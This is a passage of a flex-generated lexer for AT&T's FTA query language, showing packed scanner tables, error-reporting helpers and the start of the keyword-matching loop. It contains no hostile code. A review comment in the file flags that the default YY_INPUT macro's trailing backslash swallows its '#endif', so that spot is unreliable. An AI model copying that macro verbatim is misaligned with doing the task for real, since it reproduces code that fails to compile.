      558,  557,  529,  516,  519,  509,  521,  510,  511,  507,
      522,  516,  513,  503,  500,  498,  513,  499,  506,  508,
      511,  531,  503,  527,  521,    0,  498,  493,  527,    0,
      512,  512,  486,  519,  491,  519,  491,  497,  501,  510,
      499,  493,  504,  503,    0,  497,  509,  488,  480,  486,
        0,  509,  484,  494,  482,  466,  487,    0,  493,  500,
      497,  458,  468,    0,  500,  489,  487,    0,  460,  490,

      462,  461,  458,  453,  449,  455,  456,  462,  447,  453,
      459,  458,  442,  438,  448,  443,  446,  472,  444,  463,
      469,  435,  440,    0,    0,  446,  445,  457,  430,    0,
      459,  467,    0,  466,  456,  444,  418,  448,  444,  451,
      417,  449,  443,  442,    0,  441,  446,    0,  436,  435,
        0,  409,  439,  423,  440,  412,  440,  412,  411,  404,
      409,  415,  401,  403,  393,  395,  400,  395,  392,  398,
      399,  414,  388,  423,  402,  394,  400,  416,  415,  417,
      389,  407,  409,  408,  378,  398,  372,  398,    0,  400,
      373,  401,  391,  365,  395,  400,  393,  366,    0,  400,

      386,  360,  385,  359,  358,  366,  372,  361,  363,  355,
      350,  353,  347,  351,  347,  347,    0,  362,  365,  360,
      363,  370,  343,  356,  355,  372,    0,  344,  374,  346,
      350,  367,  339,    0,  354,  328,  358,  366,  349,  323,
      365,  347,  321,    0,  338,  316,  322,  335,  325,  328,
      323,  313,  311,  311,  165,  347,  226,  319,  344,  316,
      332,  331,  335,  308,  329,  303,  323,  330,  303,  337,
      309,  313,  320,  322,  295,  322,  308,  307,  200,  298,
      296,  287,  290,  286,  288,  295,  284,  298,  299,  315,
      317,  271,  285,  287,  304,  277,  311,  283,    0,  287,

      286,  303,    0,  293,  267,  293,    0,    0,  289,  297,
      296,  255,  269,  271,  262,  269,   49,   62,   98,    0,
      180,  178,  163,  162,    0,  210,  186,  222,  223,  229,
      208,  209,  216,    0,  223,  198,  208,  201,  197,  206,
      217,  204,  233,    0,  210,  232,  208,  238,  213,  232,
      246,  247,  239,  250,  224,  221,  218,  222,  227,  229,
        0,    0,  257,  231,    0,  253,  228,  262,  257,  232,
      237,  233,  235,  262,  237,  269,  243,  276,    0,  241,
      246,    0,  269,  244,  270,  246,    0,  264,  274,    0,
      815,  303,  306,  302,  309,  312
    } ;
/* yy_def[]: default-state chain.  When yy_chk shows that the packed entry
 * at yy_base[state]+class does not belong to `state`, the match loop falls
 * back to yy_def[state] and retries; 691 is the jam state, 0 terminates.
 * Generated by flex — do not edit by hand. */
static yyconst flex_int16_t yy_def[697] =
    {   0,
      691,    1,  691,  691,  691,  692,  691,  693,  691,  691,
      691,  691,  691,  691,  691,  691,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  691,  691,  691,  691,  692,  693,  691,  691,
      695,  691,  696,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  695,  691,  691,  696,  691,
      691,  691,  691,  691,  691,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  691,  691,
      691,  691,  691,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,

      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
      694,  694,  694,  694,  694,  694,  694,  694,  694,  694,
        0,  691,  691,  691,  691,  691
    } ;
/* yy_nxt[]: packed next-state table.  The successor of `state` on input
 * class `c` is yy_nxt[yy_base[state] + c], valid only when the matching
 * yy_chk entry equals `state` (otherwise fall back via yy_def).
 * Generated by flex — do not edit by hand. */
static yyconst flex_uint16_t yy_nxt[884] =
    {   0,
        4,    5,    6,    7,    8,    7,    9,   10,   11,   12,
       12,   13,   14,   15,   16,   17,   18,   19,   20,   21,
       22,   23,   24,   25,   21,   21,   26,   27,   28,   29,
       30,   21,   31,   32,   33,   34,   21,   35,   36,   21,
       21,   21,   37,   38,   39,   21,   21,   40,   41,   42,
       43,   21,   44,   45,   46,   47,   21,   48,   49,   50,
       21,   21,   51,   52,   21,   53,   54,   55,   59,   79,
       60,   62,   62,   64,   93,   65,   65,   68,   69,   70,
       71,   72,   98,   74,   99,   66,  179,   87,   75,   80,
      640,   76,   81,   95,   79,   88,  180,   96,   82,   94,

      101,   67,  110,  102,   89,  112,   90,  113,  100,   77,
      114,  139,   66,   75,  117,   83,   78,  104,   84,  641,
       97,  105,   91,   85,  119,  106,  123,  103,  111,   92,
      120,  118,  115,  124,  158,  116,  135,  140,  129,  159,
      146,  125,  126,  136,  107,  130,  131,  147,  108,  642,
      141,  121,  109,  127,   75,  132,  122,  142,  143,  156,
      152,  144,  157,  137,  153,  160,  145,  128,  154,  163,
      138,   59,  133,   60,   62,   62,  164,  171,  171,  161,
       64,  589,   65,   65,  168,  173,  173,  172,  183,  174,
      174,  189,   66,  227,  228,  201,  247,  184,  190,  643,

      202,  232,  590,  263,  229,  248,  644,  230,   67,  645,
      229,  168,  229,  233,  172,  264,  644,  269,  269,   66,
      203,  270,  270,  171,  171,  271,  271,  174,  174,  272,
      272,  174,  174,  172,  270,  270,  270,  270,  272,  272,
      272,  272,  592,  612,  646,  647,  648,  649,  650,  651,
      652,  653,  654,  655,  656,  644,  657,  658,  659,  660,
      172,  661,  613,  593,  661,  662,  662,  663,  664,  665,
      666,  667,  668,  669,  670,  661,  662,  671,  672,  673,
      674,  675,  676,  677,  678,  679,  679,  680,  681,  679,
      682,  682,  683,  684,  685,  682,  686,  687,  687,  688,

      687,  689,  690,   57,   73,   57,   58,   58,   58,  166,
      166,  166,  169,  169,  169,  639,  625,  638,  637,  620,
      636,  635,  634,  633,  632,  631,  630,  629,  628,  627,
      626,  625,  625,  624,  623,  620,  622,  621,  620,  619,
      608,  618,  603,  617,  599,  616,  615,  614,  611,  610,
      609,  608,  608,  607,  606,  605,  604,  603,  603,  602,
      601,  600,  599,  599,  598,  597,  596,  595,  594,  591,
      588,  587,  586,  585,  584,  583,  582,  581,  580,  579,
      578,  577,  576,  575,  574,  573,  572,  571,  570,  569,
      568,  567,  566,  565,  564,  563,  562,  561,  560,  559,

      558,  557,  556,  555,  544,  554,  553,  552,  551,  550,
      549,  548,  547,  546,  545,  517,  544,  544,  543,  542,
      541,  540,  539,  538,  537,  536,  535,  534,  533,  532,
      531,  530,  529,  528,  527,  527,  526,  525,  524,  523,
      522,  521,  520,  519,  518,  517,  517,  516,  515,  514,
      513,  512,  489,  511,  510,  509,  508,  507,  506,  505,
      504,  503,  502,  501,  500,  499,  498,  497,  496,  495,
      494,  493,  492,  491,  489,  490,  489,  488,  487,  486,
      485,  484,  483,  482,  481,  480,  479,  478,  477,  476,
      475,  474,  473,  472,  471,  470,  469,  451,  445,  468,

      467,  466,  465,  464,  430,  463,  462,  461,  460,  459,
      458,  457,  456,  455,  454,  453,  452,  451,  450,  449,
      448,  447,  445,  446,  445,  444,  443,  442,  441,  440,
      439,  438,  437,  436,  435,  434,  433,  432,  431,  430,
      430,  429,  428,  427,  426,  425,  424,  423,  422,  421,
      420,  419,  418,  417,  398,  416,  415,  414,  413,  412,
      411,  410,  375,  409,  408,  407,  406,  405,  356,  404,
      403,  402,  401,  400,  398,  399,  398,  397,  396,  395,
      394,  393,  392,  391,  390,  389,  388,  387,  386,  385,
      384,  383,  382,  381,  380,  379,  378,  377,  376,  375,

      375,  374,  373,  372,  371,  370,  369,  368,  367,  366,
      365,  364,  363,  362,  361,  360,  359,  356,  358,  357,
      356,  355,  354,  353,  352,  351,  350,  349,  323,  348,
      318,  347,  346,  345,  344,  343,  342,  341,  340,  339,
      338,  287,  337,  279,  336,  335,  334,  333,  332,  331,
      330,  329,  328,  327,  326,  323,  325,  324,  323,  322,
      321,  318,  320,  319,  318,  317,  316,  315,  314,  313,
      312,  311,  310,  309,  308,  307,  306,  305,  304,  303,
      302,  301,  300,  299,  298,  297,  296,  295,  294,  293,
      292,  291,  290,  289,  287,  288,  287,  286,  285,  284,

      283,  279,  282,  281,  280,  279,  278,  277,  276,  275,
      274,  273,  170,  167,  268,  267,  266,  265,  262,  261,
      260,  259,  258,  212,  210,  257,  208,  256,  255,  254,
      253,  252,  251,  250,  249,  177,  246,  245,  244,  243,
      242,  241,  240,  239,  238,  237,  236,  235,  234,  231,
      226,  225,  224,  223,  222,  221,  220,  219,  218,  217,
      216,  215,  214,  213,  212,  212,  210,  211,  208,  210,
      209,  208,  207,  206,  205,  204,  200,  199,  198,  197,
      196,  195,  194,  193,  192,  191,  188,  187,  186,  185,
      182,  181,  177,  178,  177,  176,  175,  170,  167,   56,

      165,  162,  155,  151,  150,  149,  148,   79,  134,   86,
       63,   61,   56,  691,    3,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691
    } ;
/* yy_chk[]: ownership check for the packed yy_nxt entries.  The entry at
 * yy_base[state]+class belongs to `state` only when
 * yy_chk[yy_base[state]+class] == state; otherwise the match loop follows
 * yy_def[state].  Generated by flex — do not edit by hand. */
static yyconst flex_int16_t yy_chk[884] =
    {   0,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    1,    1,
        1,    1,    1,    1,    1,    1,    1,    1,    8,   18,
        8,   10,   10,   12,   23,   12,   12,   14,   14,   14,
       16,   16,   25,   17,   25,   12,   80,   22,   17,   19,
      617,   17,   19,   24,   18,   22,   80,   24,   19,   23,

       26,   12,   28,   26,   22,   29,   22,   29,   25,   17,
       29,   36,   12,   17,   30,   19,   17,   27,   19,  618,
       24,   27,   22,   19,   31,   27,   32,   26,   28,   22,
       31,   30,   29,   32,   48,   29,   35,   36,   33,   48,
       40,   32,   32,   35,   27,   33,   33,   40,   27,  619,
       37,   31,   27,   32,   37,   33,   31,   37,   39,   47,
       45,   39,   47,   35,   45,   49,   39,   32,   45,   51,
       35,   58,   33,   58,   62,   62,   51,   64,   64,   49,
       65,  555,   65,   65,   62,   66,   66,   64,   83,   66,
       66,   88,   65,  126,  126,   99,  143,   83,   88,  621,

       99,  128,  555,  161,  126,  143,  622,  126,   65,  623,
      128,   62,  161,  128,   64,  161,  624,  168,  168,   65,
       99,  168,  168,  171,  171,  172,  172,  173,  173,  172,
      172,  174,  174,  171,  269,  269,  270,  270,  271,  271,
      272,  272,  557,  579,  626,  627,  628,  629,  630,  631,
      632,  633,  635,  636,  637,  638,  639,  640,  641,  642,
      171,  643,  579,  557,  645,  646,  647,  648,  649,  650,
      651,  652,  653,  654,  655,  656,  657,  658,  659,  660,
      663,  664,  666,  667,  668,  669,  670,  671,  672,  673,
      674,  675,  676,  677,  678,  680,  681,  683,  684,  685,

      686,  688,  689,  692,  694,  692,  693,  693,  693,  695,
      695,  695,  696,  696,  696,  616,  615,  614,  613,  612,
      611,  610,  609,  606,  605,  604,  602,  601,  600,  598,
      597,  596,  595,  594,  593,  592,  591,  590,  589,  588,
      587,  586,  585,  584,  583,  582,  581,  580,  578,  577,
      576,  575,  574,  573,  572,  571,  570,  569,  568,  567,
      566,  565,  564,  563,  562,  561,  560,  559,  558,  556,
      554,  553,  552,  551,  550,  549,  548,  547,  546,  545,
      543,  542,  541,  540,  539,  538,  537,  536,  535,  533,
      532,  531,  530,  529,  528,  526,  525,  524,  523,  522,

      521,  520,  519,  518,  516,  515,  514,  513,  512,  511,
      510,  509,  508,  507,  506,  505,  504,  503,  502,  501,
      500,  498,  497,  496,  495,  494,  493,  492,  491,  490,
      488,  487,  486,  485,  484,  483,  482,  481,  480,  479,
      478,  477,  476,  475,  474,  473,  472,  471,  470,  469,
      468,  467,  466,  465,  464,  463,  462,  461,  460,  459,
      458,  457,  456,  455,  454,  453,  452,  450,  449,  447,
      446,  444,  443,  442,  441,  440,  439,  438,  437,  436,
      435,  434,  432,  431,  429,  428,  427,  426,  423,  422,
      421,  420,  419,  418,  417,  416,  415,  414,  413,  412,

      411,  410,  409,  408,  407,  406,  405,  404,  403,  402,
      401,  400,  399,  397,  396,  395,  393,  392,  391,  390,
      389,  387,  386,  385,  384,  383,  382,  380,  379,  378,
      377,  376,  374,  373,  372,  371,  370,  369,  368,  367,
      366,  365,  364,  363,  362,  361,  359,  358,  357,  355,
      354,  353,  352,  351,  350,  349,  348,  347,  346,  345,
      344,  343,  342,  341,  340,  339,  338,  337,  336,  335,
      334,  333,  332,  331,  330,  329,  328,  327,  326,  324,
      322,  321,  320,  319,  317,  316,  315,  314,  313,  312,
      311,  310,  309,  308,  307,  306,  305,  304,  303,  302,

      301,  300,  298,  297,  296,  295,  294,  293,  292,  291,
      290,  289,  288,  286,  285,  284,  283,  282,  281,  280,
      278,  277,  276,  275,  274,  268,  267,  266,  265,  264,
      263,  262,  261,  260,  259,  258,  257,  256,  255,  254,
      253,  252,  251,  250,  249,  248,  247,  246,  245,  244,
      243,  242,  241,  240,  239,  238,  237,  236,  235,  234,
      233,  232,  231,  230,  228,  227,  226,  225,  224,  223,
      222,  221,  220,  219,  218,  217,  216,  215,  214,  213,
      211,  209,  207,  206,  205,  204,  203,  202,  201,  200,
      199,  197,  196,  195,  194,  193,  191,  190,  189,  188,

      187,  186,  185,  184,  183,  182,  181,  180,  179,  178,
      176,  175,  169,  166,  165,  164,  163,  162,  160,  159,
      158,  157,  156,  155,  154,  153,  152,  151,  150,  149,
      148,  147,  146,  145,  144,  142,  141,  140,  139,  138,
      137,  136,  135,  134,  133,  132,  131,  130,  129,  127,
      125,  124,  123,  122,  121,  120,  119,  118,  117,  116,
      115,  114,  113,  112,  111,  110,  109,  108,  107,  106,
      105,  104,  103,  102,  101,  100,   98,   97,   96,   95,
       94,   93,   92,   91,   90,   89,   87,   86,   85,   84,
       82,   81,   78,   77,   76,   74,   67,   63,   61,   56,

       52,   50,   46,   44,   43,   42,   41,   38,   34,   20,
       11,    9,    5,    3,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691,  691,  691,  691,  691,  691,  691,  691,
      691,  691,  691
    } ;
/* Longest-match backup: when the DFA runs past the last accepting state,
 * scanning resumes from the state/position recorded here (see the
 * "have to back up" branch in the match loop). */
static yy_state_type yy_last_accepting_state;
static char *yy_last_accepting_cpos;
extern int FtaParser_flex_debug;
int FtaParser_flex_debug = 0;
/* The intent behind this definition is that it'll catch
 * any uses of REJECT which flex missed.
 */
#define REJECT reject_used_but_not_detected
/* yymore() support: carries the previous match's length into the next one. */
static int yy_more_flag = 0;
static int yy_more_len = 0;
#define yymore() ((yy_more_flag) = 1)
#define YY_MORE_ADJ (yy_more_len)
#define YY_RESTORE_YY_MORE_OFFSET
/* Text of the current token (flex's yytext, with the FtaParser prefix). */
char *FtaParsertext;
#line 1 "fta.l"
/* ------------------------------------------------
Copyright 2020 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
/*
MUST COMPILE WITH
flex -PFtaParser -oftalexer.cc fta.l
(or equivalent).
*/
#line 24 "fta.l"
/*
* AT&T lex can't handle this lexer due to lex bugs. It works with flex
* 2.3.7, pclex 2.0.5, and MKS lex 3.1a.
*/
#include "parse_fta.h"
#include "parse_schema.h"
#include <string.h>
#include "fta.tab.cc.h"
/*
Some includes that flex doesn't include as standard,
but which are needed.
*/
#include <stdlib.h>
#include <string.h>
// Prevent flex from defining FtaParserwrap as extern "C"
#define YY_SKIP_YYWRAP
/* No lex lib, supply the FtaParserwrap fcn. that normally resides there
*/
//int FtaParserwrap(){return(1);}
extern int FtaParserdebug;
/*
These variables are used for error reporting:
flex_fta_lineno : the line currently being parsed when the error occurs.
flex_fta_ch : the character on the line where the error occurs
flex_fta_linebuf : store the line for reporting.
NOTE : 1) the fixed size flex_fta_linebuf buffer is dangerous.
2) You might get pointed to a place shortly after
where the syntax error occurs. It is close enough
for now.
*/
int flex_fta_lineno = 1;
int flex_fta_ch = 0;
char flex_fta_linebuf[200000];
/* Input plumbing: the scanner pulls bytes through my_FtaParser_yyinput
 * (wired in via the YY_INPUT override below); these presumably select
 * between an in-memory string and a FILE source — defined elsewhere,
 * confirm against the my_FtaParser_yyinput implementation. */
char *flex_fta_stringinput = NULL;
int flex_fta_stringinput_ptr = 0;
FILE *flex_fta_fileinput = NULL;
int my_FtaParser_yyinput(char *buf, int max_size);
/* Report a scanner/parser error to stderr: print the line/char position,
 * the message, the offending token and the current line, then a caret
 * aligned under the error column.  Tabs in the prefix are echoed as tabs
 * so the caret lines up regardless of tab stops. */
void FtaParsererror(char *s){
	fprintf(stderr,"On line %d, char %d: %s (token %s):\n%s\n",
		flex_fta_lineno, flex_fta_ch, s, FtaParsertext, flex_fta_linebuf );
	/* Pad out to the error column, preserving tab alignment. */
	for(int col = 0; col < flex_fta_ch; col++){
		fprintf(stderr, "%c", flex_fta_linebuf[col] == '\t' ? '\t' : ' ');
	}
	fprintf(stderr,"^\n");
}
/* Route all scanner input through the user reader my_FtaParser_yyinput
 * (declared above) instead of flex's stdio-based default. */
#undef YY_INPUT
#define YY_INPUT(b, r, ms) (r = my_FtaParser_yyinput(b,ms))
/* MKS needs the next line to increase the NFA table */
#line 1013 "ftalexer.cc"
/* This scanner uses only the default INITIAL start condition. */
#define INITIAL 0
#ifndef YY_NO_UNISTD_H
/* Special case for "unistd.h", since it is non-ANSI. We include it way
 * down here because we want the user's section 1 to have been scanned first.
 * The user has a chance to override it with an option.
 */
#include <unistd.h>
#endif
#ifndef YY_EXTRA_TYPE
#define YY_EXTRA_TYPE void *
#endif
static int yy_init_globals (void );
/* Accessor methods to globals.
These are made visible to non-reentrant scanners for convenience. */
int FtaParserlex_destroy (void );
int FtaParserget_debug (void );
void FtaParserset_debug (int debug_flag );
YY_EXTRA_TYPE FtaParserget_extra (void );
void FtaParserset_extra (YY_EXTRA_TYPE user_defined );
FILE *FtaParserget_in (void );
void FtaParserset_in (FILE * _in_str );
FILE *FtaParserget_out (void );
void FtaParserset_out (FILE * _out_str );
yy_size_t FtaParserget_leng (void );
char *FtaParserget_text (void );
int FtaParserget_lineno (void );
void FtaParserset_lineno (int _line_number );
/* Macros after this point can all be overridden by user definitions in
 * section 1.
 */
#ifndef YY_SKIP_YYWRAP
#ifdef __cplusplus
extern "C" int FtaParserwrap (void );
#else
extern int FtaParserwrap (void );
#endif
#endif
#ifndef YY_NO_UNPUT
    static void yyunput (int c,char *buf_ptr );
#endif
#ifndef yytext_ptr
static void yy_flex_strncpy (char *,yyconst char *,int );
#endif
#ifdef YY_NEED_STRLEN
static int yy_flex_strlen (yyconst char * );
#endif
#ifndef YY_NO_INPUT
#ifdef __cplusplus
static int yyinput (void );
#else
static int input (void );
#endif
#endif
/* Amount of stuff to slurp up with each read. */
#ifndef YY_READ_BUF_SIZE
#ifdef __ia64__
/* On IA-64, the buffer size is 16k, not 8k */
#define YY_READ_BUF_SIZE 16384
#else
#define YY_READ_BUF_SIZE 8192
#endif /* __ia64__ */
#endif
/* Copy whatever the last rule matched to the standard output. */
#ifndef ECHO
/* This used to be an fputs(), but since the string might contain NUL's,
 * we now use fwrite().
 */
#define ECHO do { if (fwrite( FtaParsertext, FtaParserleng, 1, FtaParserout )) {} } while (0)
#endif
/* Gets input and stuffs it into "buf".  The number of characters read, or
 * YY_NULL, is returned in "result".  (Dead code here: YY_INPUT was already
 * redefined above to call my_FtaParser_yyinput, so this default is skipped.) */
#ifndef YY_INPUT
#define YY_INPUT(buf,result,max_size) \
	if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \
		{ \
		int c = '*'; \
		size_t n; \
		for ( n = 0; n < max_size && \
			     (c = getc( FtaParserin )) != EOF && c != '\n'; ++n ) \
			buf[n] = (char) c; \
		if ( c == '\n' ) \
			buf[n++] = (char) c; \
		if ( c == EOF && ferror( FtaParserin ) ) \
			YY_FATAL_ERROR( "input in flex scanner failed" ); \
		result = n; \
		} \
	else \
		{ \
		errno=0; \
		while ( (result = fread(buf, 1, max_size, FtaParserin))==0 && ferror(FtaParserin)) \
			{ \
			if( errno != EINTR) \
				{ \
				YY_FATAL_ERROR( "input in flex scanner failed" ); \
				break; \
				} \
			errno=0; \
			clearerr(FtaParserin); \
			} \
		}\
\
#endif
/* NOTE(review): the lone '\' immediately above continues the macro into the
 * '#endif' line; stock flex emits a blank line there.  Verify a blank line
 * was not lost — as written this would confuse the preprocessor. */
/* No semi-colon after return; correct usage is to write "yyterminate();" -
 * we don't want an extra ';' after the "return" because that will cause
 * some compilers to complain about unreachable statements.
 */
#ifndef yyterminate
#define yyterminate() return YY_NULL
#endif
/* Number of entries by which start-condition stack grows. */
#ifndef YY_START_STACK_INCR
#define YY_START_STACK_INCR 25
#endif
/* Report a fatal error. */
#ifndef YY_FATAL_ERROR
#define YY_FATAL_ERROR(msg) yy_fatal_error( msg )
#endif
/* end tables serialization structures and prototypes */
/* Default declaration of generated scanner - a define so the user can
 * easily add parameters.
 */
#ifndef YY_DECL
#define YY_DECL_IS_OURS 1
extern int FtaParserlex (void);
#define YY_DECL int FtaParserlex (void)
#endif /* !YY_DECL */
/* Code executed at the beginning of each rule, after FtaParsertext and FtaParserleng
 * have been set up.
 */
#ifndef YY_USER_ACTION
#define YY_USER_ACTION
#endif
/* Code executed at the end of each rule. */
#ifndef YY_BREAK
#define YY_BREAK /*LINTED*/break;
#endif
#define YY_RULE_SETUP \
	YY_USER_ACTION
/** The main scanner function which does all the work.
 */
YY_DECL
{
yy_state_type yy_current_state;
char *yy_cp, *yy_bp;
int yy_act;
if ( !(yy_init) )
{
(yy_init) = 1;
#ifdef YY_USER_INIT
YY_USER_INIT;
#endif
if ( ! (yy_start) )
(yy_start) = 1; /* first start state */
if ( ! FtaParserin )
FtaParserin = stdin;
if ( ! FtaParserout )
FtaParserout = stdout;
if ( ! YY_CURRENT_BUFFER ) {
FtaParserensure_buffer_stack ();
YY_CURRENT_BUFFER_LVALUE =
FtaParser_create_buffer(FtaParserin,YY_BUF_SIZE );
}
FtaParser_load_buffer_state( );
}
{
#line 104 "fta.l"
/* literal keyword tokens */
/*
The actions associated with each text token are to
keep track of the current location (for syntax error reporting)
and to report any necessary info to the emf.y parse tree builder
It's likely that there are a number of omissions, inconsistencies
(some keywords do not need to be in caps), and relics
(keywords such as BETWEEN, INDICATOR, etc., are not used
in emf.y)
This parser is somewhat of a work in progress.
*/
/* Query keywords */
#line 1250 "ftalexer.cc"
while ( /*CONSTCOND*/1 ) /* loops until end-of-file is reached */
{
(yy_more_len) = 0;
if ( (yy_more_flag) )
{
(yy_more_len) = (yy_c_buf_p) - (yytext_ptr);
(yy_more_flag) = 0;
}
yy_cp = (yy_c_buf_p);
/* Support of FtaParsertext. */
*yy_cp = (yy_hold_char);
/* yy_bp points to the position in yy_ch_buf of the start of
* the current run.
*/
yy_bp = yy_cp;
yy_current_state = (yy_start);
yy_match:
do
{
YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)] ;
if ( yy_accept[yy_current_state] )
{
(yy_last_accepting_state) = yy_current_state;
(yy_last_accepting_cpos) = yy_cp;
}
while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state )
{
yy_current_state = (int) yy_def[yy_current_state];
if ( yy_current_state >= 692 )
yy_c = yy_meta[(unsigned int) yy_c];
}
yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c];
++yy_cp;
}
while ( yy_base[yy_current_state] != 815 );
yy_find_action:
yy_act = yy_accept[yy_current_state];
if ( yy_act == 0 )
{ /* have to back up */
yy_cp = (yy_last_accepting_cpos);
yy_current_state = (yy_last_accepting_state);
yy_act = yy_accept[yy_current_state];
}
YY_DO_BEFORE_ACTION;
do_action: /* This label is used only to access EOF actions. */
switch ( yy_act )
{ /* beginning of action switch */
case 0: /* must back up */
/* undo the effects of YY_DO_BEFORE_ACTION */
*yy_cp = (yy_hold_char);
yy_cp = (yy_last_accepting_cpos);
yy_current_state = (yy_last_accepting_state);
goto yy_find_action;
case 1:
YY_RULE_SETUP
#line 122 "fta.l"
{ flex_fta_ch+=FtaParserleng; return AND; }
YY_BREAK
case 2:
YY_RULE_SETUP
#line 123 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("AND_AGGR"); return AGGR; }
YY_BREAK
case 3:
YY_RULE_SETUP
#line 124 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("OR_AGGR"); return AGGR; }
YY_BREAK
case 4:
YY_RULE_SETUP
#line 125 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("XOR_AGGR"); return AGGR; }
YY_BREAK
case 5:
YY_RULE_SETUP
#line 126 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("AVG"); return AGGR; }
YY_BREAK
case 6:
YY_RULE_SETUP
#line 127 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("MIN"); return AGGR; }
YY_BREAK
case 7:
YY_RULE_SETUP
#line 128 "fta.l"
{ flex_fta_ch+=FtaParserleng; FtaParserlval.strval = strdup("MAX"); return AGGR; }
YY_BREAK
case 8:
YY_RULE_SETUP
#line 129 "fta.l"
